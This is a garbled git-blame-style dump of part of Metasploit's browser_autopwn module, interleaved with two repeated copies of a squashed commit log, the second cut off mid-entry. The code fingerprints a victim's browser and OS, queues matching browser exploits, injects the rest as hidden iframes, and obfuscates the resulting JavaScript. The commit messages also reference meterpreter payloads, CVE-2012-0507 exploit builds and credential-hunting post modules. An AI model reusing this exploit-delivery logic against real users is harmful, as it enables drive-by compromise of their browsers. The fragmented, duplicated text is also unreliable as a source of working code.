|
|
|
#{js_debug("'this client does not appear to be vulnerable to ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
2012-04-08 23:06:23 +00:00
|
|
|
window.next_exploit(exploit_idx+1);
|
2009-12-16 00:13:57 +00:00
|
|
|
}
|
2010-04-30 08:40:19 +00:00
|
|
|
} catch(e) {
|
2012-04-05 07:33:07 +00:00
|
|
|
#{js_debug("'test threw an exception: ' + e.message + '<br />'")}
|
2012-04-08 23:06:23 +00:00
|
|
|
window.next_exploit(exploit_idx+1);
|
2009-12-16 00:13:57 +00:00
|
|
|
};
|
Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:49 2012 -0600
Add register_command calls for md5 and sha1
commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:09 2012 -0600
Read the file instead of downloading it
commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 15:27:11 2012 -0600
Re-compile linux meterp to support the loadlib api
commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:50:25 2012 -0600
Re-compile java meterp to support the loadlib api
commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:44:10 2012 -0600
Don't try to get interfaces if this session doesn't implement it
commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:38:17 2012 -0600
Remove debugging load
commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 12:06:53 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.php
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date: Wed May 2 18:06:06 2012 -0600
PHP doesn't support rev2self
commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 18:21:59 2012 -0600
Add php support for returning new extension commands
commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 16:03:26 2012 -0600
Reset CVE-2012-0507 back to master
Purges commits unrelated to this branch.
commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:59:35 2012 -0600
Revert "Make building the jar for cve-2012-0507 a bit easier"
This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.
Conflicts:
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java
commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:35:44 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.jar
data/meterpreter/meterpreter.jar
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
modules/auxiliary/server/browser_autopwn.rb
commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date: Fri Apr 6 10:19:53 2012 -0600
Merge branch 'rapid7' into feature/4905
commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:51:18 2012 -0600
Fix requires to find the test library
commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:48:35 2012 -0600
Fix a load order problem with solaris post mods
commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:43:19 2012 -0600
Merge branch 'master' into feature/4905
commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:16:56 2012 -0600
Merge branch 'rapid7'
Conflicts:
lib/rex/exploitation/javascriptosdetect.rb
commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 18:04:50 2012 -0600
Linux doesn't implement (drop|steal)_token
commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 17:57:37 2012 -0600
Add availability checks for net, sys, ui, and webcam
commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 16:45:59 2012 -0600
add requirement checking for fs and core commands
commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:59 2012 -0600
Add a to_octal method that converts e.g. "A" to \0101
commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:07 2012 -0600
Don't use "echo -n"
It's not portable
commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 17:01:10 2012 -0600
Return a list of new commands after core_loadlib, java version
Thanks mihi for the patch and the awesome responsiveness!
commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 13:21:06 2012 -0600
Make sure we have a response before doing stuff with it
commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 21:25:31 2012 -0600
Add missing rmdir and mkdir protocol commands to PHP
Now passes all the stdapi tests that it can
[*] Session type is meterpreter and platform is php/php
[+] should return a user id
[+] should return a sysinfo Hash
[-] FAILED: should return network interfaces
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should have an interface that matches session_host
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[-] Passed: 10; Failed: 3
commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:26:00 2012 -0600
Use a proper TLV type instead of a generic one
commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:24:25 2012 -0600
Fix a counting error that caused segfaults (Linux)
commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:06:02 2012 -0600
Return a list of new commands after core_loadlib
Gets Windows back in sync with Linux
commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 14:50:55 2012 -0600
Refactor extensionList -> extension_commands
It's not the same as extension_list.
commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sun Mar 18 00:07:27 2012 -0500
Massive whitespace cleanup
commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 16:00:20 2012 -0500
Add back enum_protections with some new changes
commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd part av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
2012-05-15 23:00:02 +00:00
|
|
|
};
|
2008-07-22 07:28:05 +00:00
|
|
|
ENDJS
|
|
|
|
|
2012-04-05 07:33:07 +00:00
|
|
|
sploits_for_this_client = []
|
2012-04-04 00:22:56 +00:00
|
|
|
sploit_cnt = 0
|
2011-05-20 09:11:43 +00:00
|
|
|
# if we have no client_info, this will add all tests. Otherwise tries
|
|
|
|
# to only send tests for exploits that target the client's detected
|
|
|
|
# browser.
|
2009-07-22 20:14:35 +00:00
|
|
|
@js_tests.each { |browser, sploits|
|
2011-05-20 09:11:43 +00:00
|
|
|
next unless client_matches_browser(client_info, browser)
|
|
|
|
|
2012-04-09 07:53:57 +00:00
|
|
|
# Send all the generics regardless of what the client is. If the
|
|
|
|
# client is nil, then we don't know what it really is, so just err
|
|
|
|
# on the side of shells and send everything. Otherwise, send only
|
|
|
|
# if the client is using the browser associated with this set of
|
|
|
|
# exploits.
|
|
|
|
if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
|
2011-05-20 09:11:43 +00:00
|
|
|
sploits.each do |s|
|
|
|
|
if s[:vuln_test].nil? or s[:vuln_test].empty?
|
|
|
|
test = "is_vuln = true"
|
|
|
|
else
|
|
|
|
# get rid of newlines and escape quotes
|
|
|
|
test = s[:vuln_test].gsub("\n",'').gsub("'", "\\\\'")
|
|
|
|
end
|
2009-12-16 00:13:57 +00:00
|
|
|
# shouldn't be any in the resource, but just in case...
|
|
|
|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
|
|
|
|
|
2009-08-06 05:56:24 +00:00
|
|
|
# Skip exploits that don't match the client's OS.
|
2009-07-23 08:43:54 +00:00
|
|
|
if (host_info and host_info[:os_name] and s[:os_name])
|
2012-04-05 07:33:07 +00:00
|
|
|
# Reject exploits whose OS doesn't match that of the
|
|
|
|
# victim. Note that host_info comes from javascript OS
|
|
|
|
# detection, NOT the database.
|
|
|
|
if host_info[:os_name] != "undefined"
|
2012-04-09 07:53:57 +00:00
|
|
|
unless s[:os_name].include?(host_info[:os_name])
|
|
|
|
vprint_status("Rejecting #{s[:name]} for non-matching OS")
|
|
|
|
next
|
|
|
|
end
|
2011-05-20 09:11:43 +00:00
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
end
|
2011-05-20 09:11:43 +00:00
|
|
|
js << "global_exploit_list[global_exploit_list.length] = {\n"
|
|
|
|
js << " 'test':'#{test}',\n"
|
2009-12-16 00:13:57 +00:00
|
|
|
js << " 'resource':'#{res}'\n"
|
2011-05-20 09:11:43 +00:00
|
|
|
js << "};\n"
|
2012-04-05 07:33:07 +00:00
|
|
|
sploits_for_this_client.push s[:name]
|
|
|
|
sploit_cnt += 1
|
2011-05-20 09:11:43 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
}
|
|
|
|
|
|
|
|
# Add a javaEnabled() test specifically for java exploits. Other
|
|
|
|
# exploits that don't require javascript go into a big pile of iframes
|
|
|
|
# that will be dumped out after other exploitation is done, assuming
|
|
|
|
# the browser didn't stop somewhere along the way due to a successful
|
|
|
|
# exploit or a crash from all the memory raping we just did.
|
|
|
|
noscript_html = ""
|
|
|
|
@noscript_tests.each { |browser, sploits|
|
|
|
|
sploits.each do |s|
|
|
|
|
if s[:name] =~ %r|/java_|
|
|
|
|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
|
|
|
|
js << "global_exploit_list[global_exploit_list.length] = {\n"
|
|
|
|
js << " 'test':'is_vuln = navigator.javaEnabled()',\n"
|
|
|
|
js << " 'resource':'#{res}'\n"
|
|
|
|
js << "};\n"
|
|
|
|
else
|
|
|
|
# Some other kind of exploit that we can't generically
|
|
|
|
# check for in javascript, throw it on the pile.
|
|
|
|
noscript_html << html_for_exploit(s, client_info)
|
2009-07-22 20:14:35 +00:00
|
|
|
end
|
2012-04-05 07:33:07 +00:00
|
|
|
sploits_for_this_client.push s[:name]
|
2012-04-04 00:22:56 +00:00
|
|
|
sploit_cnt += 1
|
2009-07-22 20:14:35 +00:00
|
|
|
end
|
2008-09-01 05:19:28 +00:00
|
|
|
}
|
2009-07-19 20:48:47 +00:00
|
|
|
|
2011-05-20 09:11:43 +00:00
|
|
|
# If all of our exploits that require javascript fail, try to continue
|
|
|
|
# with those that don't
|
|
|
|
js << %Q|var noscript_exploits = "|
|
|
|
|
js << Rex::Text.to_hex(noscript_html, "%")
|
|
|
|
js << %Q|";\n|
|
2011-06-03 00:36:26 +00:00
|
|
|
js << %Q|var noscript_div = document.createElement("div");\n|
|
2012-04-05 07:33:07 +00:00
|
|
|
# Have to use innerHTML here to render the new iframes. Using
|
|
|
|
# document.createElement and appendChild() will escape all the
|
|
|
|
# entities.
|
2011-05-20 09:11:43 +00:00
|
|
|
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
|
|
|
|
js << %Q|document.body.appendChild(noscript_div);\n|
|
|
|
|
|
2012-04-08 23:06:23 +00:00
|
|
|
js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
|
|
|
|
js << "window.next_exploit(0);\n"
|
2011-06-03 00:36:26 +00:00
|
|
|
|
|
|
|
js = ::Rex::Exploitation::JSObfu.new(js)
|
Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:49 2012 -0600
Add register_command calls for md5 and sha1
commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:09 2012 -0600
Read the file instead of downloading it
commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 15:27:11 2012 -0600
Re-compile linux meterp to support the loadlib api
commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:50:25 2012 -0600
Re-compile java meterp to support the loadlib api
commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:44:10 2012 -0600
Don't try to get interfaces if this session doesn't implement it
commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:38:17 2012 -0600
Remove debugging load
commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 12:06:53 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.php
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date: Wed May 2 18:06:06 2012 -0600
PHP doesn't support rev2self
commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 18:21:59 2012 -0600
Add php support for returning new extension commands
commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 16:03:26 2012 -0600
Reset CVE-2012-0507 back to master
Purges commits unrelated to this branch.
commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:59:35 2012 -0600
Revert "Make building the jar for cve-2012-0507 a bit easier"
This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.
Conflicts:
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java
commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:35:44 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.jar
data/meterpreter/meterpreter.jar
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
modules/auxiliary/server/browser_autopwn.rb
commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date: Fri Apr 6 10:19:53 2012 -0600
Merge branch 'rapid7' into feature/4905
commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:51:18 2012 -0600
Fix requires to find the test library
commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:48:35 2012 -0600
Fix a load order problem with solaris post mods
commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:43:19 2012 -0600
Merge branch 'master' into feature/4905
commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:16:56 2012 -0600
Merge branch 'rapid7'
Conflicts:
lib/rex/exploitation/javascriptosdetect.rb
commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
